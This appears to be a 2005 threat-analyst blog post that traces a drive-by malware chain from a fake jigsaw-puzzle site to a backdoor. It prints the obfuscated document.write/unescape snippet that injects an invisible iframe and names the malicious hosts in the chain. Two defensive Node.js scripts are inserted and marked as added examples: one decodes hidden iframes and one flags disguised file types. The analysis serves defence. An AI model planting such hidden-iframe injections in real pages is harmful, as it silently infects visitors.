
A Mixed Threat Adventure

  • Posted on: October 27, 2005 at 3:44 am
  • Posted in: Bad Sites
  • Author: Jhoevine Capicio (Threats Analyst)

Mixed threats are becoming more and more common nowadays. Most of the time, users don’t even know what hit them until it’s too late. Just visit a site, one that REALLY looks like a legitimate one by the way, and presto – you have instant adware, spyware, backdoors, trojans or even worms roaming free and undetected on your system!

We have reported many examples of what we may call Mixed Threat Adventures, or mal-Adventures, in the past, but here’s one current example that is still out there in the wild, so to speak!

This site, http://www.freedailyjigsawpuzzles.com/, REALLY just looks like a normal website offering free jigsaw puzzles.

But by looking at the source code of this would-be “Normal Website”, I saw this – a piece of JavaScript obfuscated with the escape function, which is why the page looks harmless at first glance:

document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D' +
    '%22%68%74%74%70%3A%2F%2F%77%77%77%2E%70%66%6C%2D%65%6E%6C' +
    '%61%72%67%65%2E%63%6F%6D%22%20%77%69%64%74%68%3D%30%20%62' +
    '%6F%72%64%65%72%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F' +
    '%69%66%72%61%6D%65%3E'));
// decodes to: <iframe src="http://www.pfl-enlarge.com" width=0 border=0 height=0></iframe>


which, when unescaped, writes a zero-width, zero-height (and therefore invisible) iframe that silently loads another website, http://www.pfl-enlarge.com.

This website in turn loads another site, http://www.britroadsters.com, again through a hidden iframe.

The http://www.britroadsters.com site checks which browser the visitor is using. If the browser is “Microsoft Internet Explorer” it loads the file enter.php, and if it’s not it loads the file all.php. It doesn’t really matter which, however, since both files just load yet another website through a hidden iframe, which leads to http://www.secretadvise.biz/news.html.
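Every hop in the chain above uses the same trick: an escape-encoded document.write() that injects an invisible iframe. As an added example (not from the original post or from Trend Micro), here is a small Node.js script that decodes such payloads the way the injected script does and reports iframes sized to be invisible, so an analyst can see where each hop points without rendering the page. The sample page, the placeholder destination example.invalid and all function names are constructed for this example.

```javascript
// Added example, not code from the original post. Decodes document.write(unescape(...))
// payloads and flags hidden iframes. Node's global unescape() is the same legacy
// function the injected script calls, so %XX sequences decode exactly as the
// browser would decode them.

// Constructed sample page: a harmless-looking puzzle site with an injected script,
// modelled on the snippet quoted in the post. The destination inside the payload is
// the placeholder http://example.invalid, not a real domain.
const SAMPLE_PAGE = `
<html><body>
<h1>Free Daily Jigsaw Puzzles</h1>
<script>
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%65%78%61%6D%70%6C%65%2E%69%6E%76%61%6C%69%64%22%20%77%69%64%74%68%3D%30%20%62%6F%72%64%65%72%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E'));
</script>
</body></html>`;

// Pull out every string literal passed to document.write(unescape('...')).
function extractEscapedPayloads(html) {
  const re = /document\.write\s*\(\s*unescape\s*\(\s*['"]([^'"]*)['"]\s*\)\s*\)/g;
  const payloads = [];
  let m;
  while ((m = re.exec(html)) !== null) payloads.push(m[1]);
  return payloads;
}

// Decode a payload with the legacy unescape(), mirroring what the script would emit.
function decodePayload(escaped) {
  return unescape(escaped);
}

// Find iframes in decoded markup; an iframe with width or height 0 is invisible.
function findIframes(markup) {
  const tagRe = /<iframe\b([^>]*)>/gi;
  const frames = [];
  let m;
  while ((m = tagRe.exec(markup)) !== null) {
    const attrs = m[1];
    const attr = (name) => {
      const r = new RegExp(`\\b${name}\\s*=\\s*["']?([^"'\\s>]+)`, 'i').exec(attrs);
      return r ? r[1] : null;
    };
    const width = attr('width');
    const height = attr('height');
    frames.push({ src: attr('src'), width, height, hidden: width === '0' || height === '0' });
  }
  return frames;
}

// Scan a page: decode each escaped payload and return the hidden iframes it writes.
function scanPage(html) {
  const findings = [];
  for (const escaped of extractEscapedPayloads(html)) {
    const decoded = decodePayload(escaped);
    for (const frame of findIframes(decoded)) {
      if (frame.hidden) findings.push({ decoded, ...frame });
    }
  }
  return findings;
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of scanPage(SAMPLE_PAGE)) {
    console.log(`hidden iframe -> ${f.src} (width=${f.width}, height=${f.height})`);
  }
}
```

Each reported src is the next hop in the chain; the post's chain needed this step four times before reaching the page that carried the actual exploit. The script only decodes text and never fetches or renders anything, which is the point: the destinations are examined offline rather than visited.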

Hehe… In the words of my TL, this is just like following the bouncing ball of malware.

So on the site http://www.secretadvise.biz/news.html, which is reeeally an “evil” site, there is a JavaScript (again encoded with escape) which exploits the Microsoft HTML Help Vulnerability (MS04-013) and ultimately downloads and executes a file named “Style.css”.

Here is an image of the decoded script from news.html.



Voila! The exploit code can now be seen… along with a mysterious Style.css file…

From website links, we now move on to the downloaded files.

Don’t be fooled by the extension – Style.css is actually a CHM (compiled HTML Help) file, which drops an EXE file named open.exe. There, now we’re getting somewhere! :) hehe.. But that’s not where it ends…

The file open.exe is also just a downloader; it downloads a file from http://www.secretadvise.biz/girl.bmp. And this “bmp” file is – hold your horses – a backdoor!
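Both downloads rely on the same disguise: a file extension that says one thing while the bytes say another. As an added example (again not from the original post or from Trend Micro), the following Node.js snippet identifies a file by its leading bytes against well-known public magic values and reports when that disagrees with the extension, which is exactly what would expose a CHM file (starting with the bytes ITSF) served as Style.css and a Windows executable (starting with MZ) served as girl.bmp. The sample buffers and file names are constructed, not the real files from the post, and treating the backdoor as a Windows executable is an assumption based on its BKDR_ detection name.

```javascript
// Added example, not code from the original post. Classifies a file by its magic
// bytes and flags extension mismatches. Only the first few bytes are inspected.

// Well-known public file signatures (a small subset, enough for this example).
const SIGNATURES = [
  { type: 'chm', magic: Buffer.from('ITSF', 'ascii') },          // Compiled HTML Help
  { type: 'exe', magic: Buffer.from('MZ', 'ascii') },            // Windows PE / DOS stub
  { type: 'bmp', magic: Buffer.from('BM', 'ascii') },            // Windows bitmap
  { type: 'png', magic: Buffer.from([0x89, 0x50, 0x4e, 0x47]) }, // PNG
];

// Extensions that legitimately carry each detected type. Text formats such as .css
// have no magic at all, so any binary signature under such an extension is suspect.
const EXPECTED = { bmp: ['bmp'], png: ['png'], exe: ['exe', 'dll', 'scr'], chm: ['chm'] };

// Return the detected type, or 'unknown' when no signature matches.
function identify(bytes) {
  for (const { type, magic } of SIGNATURES) {
    if (bytes.length >= magic.length && bytes.subarray(0, magic.length).equals(magic)) {
      return type;
    }
  }
  return 'unknown';
}

function extensionOf(name) {
  const i = name.lastIndexOf('.');
  return i < 0 ? '' : name.slice(i + 1).toLowerCase();
}

// Compare what the name claims with what the bytes show.
// mismatch is true when a recognised binary type hides behind the wrong extension.
function checkFile(name, bytes) {
  const ext = extensionOf(name);
  const type = identify(bytes);
  const mismatch = type !== 'unknown' && !(EXPECTED[type] || []).includes(ext);
  return { name, ext, type, mismatch };
}

// Constructed sample files (headers only, padded with zero bytes): a CHM posing as a
// stylesheet, an executable posing as a bitmap, a genuine bitmap and a genuine stylesheet.
const SAMPLES = [
  { name: 'Style.css', bytes: Buffer.concat([Buffer.from('ITSF'), Buffer.alloc(60)]) },
  { name: 'girl.bmp',  bytes: Buffer.concat([Buffer.from('MZ'), Buffer.alloc(62)]) },
  { name: 'logo.bmp',  bytes: Buffer.concat([Buffer.from('BM'), Buffer.alloc(62)]) },
  { name: 'site.css',  bytes: Buffer.from('body { color: #000; }') },
];

function scanSamples() {
  return SAMPLES.map((s) => checkFile(s.name, s.bytes));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of scanSamples()) {
    console.log(`${r.name}: ext=${r.ext} type=${r.type}${r.mismatch ? '  <-- MISMATCH' : ''}`);
  }
}
```

Real-world use would read the first bytes of each file from disk (or from a proxy's download log) and feed them to checkFile; the signature table is deliberately tiny, so 'unknown' means "not in the table", not "safe".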

The files have been sent to the service team for signature generation, and here’s the reply. The files will be detected as follows:

News.html (1,998 bytes) – JS_WONKA.B
Style.css (13,016 bytes) – CHM_DROPPER.CN
Open.exe (2,608 bytes) – TROJ_DLOADER.AJH
Girl.bmp (50,920 bytes) – BKDR_HAXDOOR.CT

So let us review: just by visiting a site, a seemingly normal and non-malicious site, the system gets infected with four pieces of malware. Plus there’s the added bonus of having a malicious user hack into your system because of BKDR_HAXDOOR.CT!

So for those Net-Surfers out there, just keep in mind which sites you go to. Plus, of course, it’s always a good thing to have your systems patched and your pattern files updated. :)
